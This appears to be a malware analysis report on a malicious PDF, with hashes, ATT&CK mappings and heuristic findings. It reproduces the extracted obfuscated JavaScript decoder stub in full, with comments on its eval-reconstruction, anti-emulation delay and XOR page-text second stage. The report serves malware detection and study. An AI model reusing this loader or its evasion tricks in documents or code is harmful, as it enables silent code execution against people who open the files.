Malicious PDF — malware analysis report

Static analysis result for SHA-256 728dc16b0b0cbe6c…

MALICIOUS

PDF

7.3 KB Authoring application: Tooqimeqipigafara (via ee7f7Renizaxizo)
MD5: 0d40debb5b5bbe26d6e28412fc0645fd SHA-1: c7a2019d8f3f3a9e2b01a3b8af275be7da1e3074 SHA-256: 728dc16b0b0cbe6ce59c5c30ffbfdbc8484f66a54fd99dc49b9eeb7975039c29
106 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The PDF contains obfuscated JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_OBFUSCATED_NAME_OBJECT. The ML classifier also flagged it as malicious with high confidence. The extracted script (javascript_obj0010_000.js, carved from /JS object 10) is a decoder stub: it strips filler characters from an embedded string with a fixed character-class regex, reverses "lave"/"epytotorp" to recover `eval`/`prototype` so neither word appears literally, recurses until a counter exceeds 55 (a cheap anti-emulation delay), and only then evals the cleaned string. Hand-decoding that string shows an inner stage built on the Acrobat Doc/app API (`getPageNumWords`, `getPageNthWord`, `app.eval`): it concatenates the words of the current page, parses them as hex byte pairs XORed with 250 (0xFA), rebuilds the result as a "\x.." escape string and executes it. The second stage is therefore carried inside the document's own page text rather than fetched from the network — no URL or download call is visible in the preview — so any "download and execute" behaviour would come from that hidden stage and should be confirmed by decoding the page content.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9991

Heuristics 3

  • Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECT
    A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. The PDF syntax permits #XX escapes in any name, but mainstream producers write /JavaScript and /JS literally; hex-encoding an executable name has no legitimate purpose and is a deliberate evasion used by exploit-kit and dropper PDFs.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
javascript_obj0010_000.js
b53e27bbdeba8c818850cc3826b3d643c06114ca0ccd161a827d53f8e26598c4
pdf-javascript-stream PDF /JS object 10 at offset 0x130D 2214 bytes
Preview script
First 1,000 lines of the extracted script
// Extracted /JS stream from object 10 (see artifact table above). This is the
// outer decoder stub of the malicious PDF. The code below is preserved
// byte-for-byte — including the line wrap inside the `jOZ` literal, which is
// an artefact of the preview — only these comments were added. Do NOT run it.
//
// What the visible code does:
//   - `jOZ` is the real payload, padded with filler characters. `lSP`
//     (/[\>8%U&#\$~\|\!k9]/g) matches exactly those fillers and
//     `jOZ.replace(lSP, '')` strips them, leaving plain JavaScript source.
//   - `zAL` reverses a string (loop from `length` down to 0; the out-of-range
//     first `charAt` just yields ""). It turns "lave" into "eval" and
//     "epytotorp" into "prototype" so neither word appears literally.
//   - `x[nEX] = {...}` is therefore `x.prototype = {fOF: ...}`. `fOF` recurses,
//     adding `qFMN` (1) per call, until the counter exceeds `jGL` (55) and only
//     then calls `this.tEP.eval(jOZ)`; `tEP` is the top-level `this` captured
//     in `v`. The recursion depth is a delay/anti-emulation trick — nothing
//     else depends on it.
//   - `tGB` ("Function") and `xMV` ("length") are built but not used by the
//     stub itself (the inner stage re-declares `xMV`).
//   - The enclosing try/catch swallows every error, so a failed run is silent.
//
// Hand-decoding `jOZ` (filler removed) shows the inner stage: it reads the
// current page's words via `getPageNumWords`/`getPageNthWord` on the object
// held in `tEP` (Acrobat Doc API), joins them, parses the text as hex byte
// pairs XOR 250 (`jWL`), rebuilds it as a "\x.." escape string, and executes
// it through `app.eval`; the decoded buffer is split at `length - 332` into
// `xYN`/`hSD` and a `bYZ()` that is not defined in this stub is then called,
// with `app.eval(hSD)` as the fallback on exception. No URL or network call
// appears in the preview. NOTE(review): decoded by hand from this listing —
// confirm with a deobfuscator before relying on the details.
var mXMB = null;try {var tIR=0;function x(hSL){this.tEP=hSL;};var jOZ="va!r% #skX8GkX$=!t$h$i~sk.9t#E|P>;|r#=$\'kg!e9t$PUa$g!e#N$\'|;9b#QkZ|=%r$+|\'|t#h>Wko~r~d!\'~;&t>I~P8=!r&+9\'>u8m9W!okr8d|s|\'%;8r>OkV#=9\'Up#a$g!e&N~u#m!\'$;$j8W%L& >=9 |285k0% >;%r8QUHU=U\'&\'>;8x$IkD!=U\'!j~o%ikn>\'$;>j9O#B!=9\'|\'U;$t|IUR$=~0%;Up&Q#J$=US!t8r$i%nkg$;8z!A8T&=|\'$s$u9b#skt~r9\'U;>n~A#B9=$\'ke%v!a&l>\'8;#x>M$V|=~\'!l%ekn!g8t$h|\'#;&z~G~L>S8=$\'%\\|\\$x%\'~;%l|I8ZU=#\'&t>o>S8t#rUi$n%g>\'9;kf&MUB&=>\'~p$a|rks~e$I|n>t8\'|;&t9C9P|=!\'|f%r|o9m&C8h#a8r$Cko!dUe~\'~;~b9M|Z#=k\'~ckhUa|rkC#o9d#e$A#t8\'9;%q|F$M>N$=>4U/&4!;$b&W~Zk=&1!+&4!;>v9AkP&=>2!0$0k+#5!5&;&vU=#\'|d|o|c~\'9;&v9I$X!=#3&3!2|;%x&G#Fk=k[#]U;|bkM8Xk=|\'%\'9;~f&G9L~=!1>6!;~r&K&Lk=|2k;$xUE8V%C#=k4k;!d$Q$B%=8s~X!G%X|[|tUI$Pk]!(!s#XUG!X~[&rUO!V>]>)#;>f9o9r#(%jUG8V|=~t9I9R|;~jUG&V~<> kd#Q$B$;$ Uj%G~V#+~+k)k{>v8a#r8 9b>S#Nk=$s$X8G!X#[$b%QkZ>]8(~s~X~G8X~[#r!O8V%]8,kj!G|V~,&t&r#u%e%)%;~j~OUB>=|[|j&O>B$,UbkS|N!]>[#x%I>D%]|(!rUQkH!)~;&;9}$f|o&r~(%j!GkV&=%08;Uj#G!V! |<> ~j|O8B>[~xUM9V%]9;U Uj&GUVU+>=&r&K~L&)%{|s9T|C&L!=!j~O#B%[|z&AUT&]k(9j~G8Vk,%r$K8L!)k;&r~E~F>=8p|a9r%s!e~I|n8t~(8s!T$C&L9,8f>G9L#)9;kf$I>H|=9r8EkF>^%jkWkL!;&r8W%R8=>f#I9H#.$t%o>S8tkr|i!n$g&(%f&G%L%)!;kr>W&R%=~(#r#W|RU[|x%M$V9]%=9=#q!F>M|N~)U !?9 k\'$0&\'! #+! !r>W#R& #:$ ~r%W|R$;Ux9G!Fk.!p!u$sUh%(%r8W!R|)~;~}$t%r~y! %{9b$M#X&=9n#e~w! 
8S#t8r!iUn9g|($z%GUL~S# >+$ 8x9G|F![!x#I$D~]8($z#G>L!S#)~)!;ka~pUpk[~n!A$B%]!(8\'8b&M$X|=>\"9\'&+~b8M%X&+%\'9\"U;~\'9)U;|s|XkG$XU.>x#Y%N!=U(>b9M9X8[|z>A$T>]!(~b|M|X>[!x>MUVk]8-~v|I#X$)9)%;|sUX!G%X|.$h8SUD|=>(8bkM~X8[UzkA%T>]#(8t8I9R&,&b$M$X![9x~M9V>]9->v8I9X&)%)~;!bkYUZ9(|)#;!}# %c8a!t!cUh8(>n&M~H$)~{|ikf>(%s%X$G$X%.8h9S#D#)U{>t8r$y~ |{~a9p!p|[%n#A%B~]|(ks%X>G&X&.|h$S!D%)%;9}~ kcka%t%ckh$(>n$M#H9)9{$}!}U kekl#s&e> %{$}~}>";var jGL=11+44;var v=this;var qFMN=2-1;var lSP=/[\>8%U&#\$~\|\!k9]/g;function zAL(pUD){nKB='';for(jGV=pUD.length;jGV >=0;jGV--)nKB+=pUD.charAt(jGV);return nKB;}var tGB=new String("Fun"+"cti"+"on");var xMV="len"+"gth";;jOZ=jOZ.replace(lSP, '');nAB=zAL(String("lav"+"e"));nEX=zAL("epyt"+"otor"+"p");;x[nEX]={fOF : function(jQT){if(jQT > jGL){this.tEP[nAB](jOZ);} else {mXMB.fOF(jQT+qFMN);}},};var mXMB=new x(v);mXMB.fOF(tIR);} catch(bMX){}
// The empty catch above is the last line of the stub: any failure (missing
// Acrobat API, exploit not firing) is silently discarded.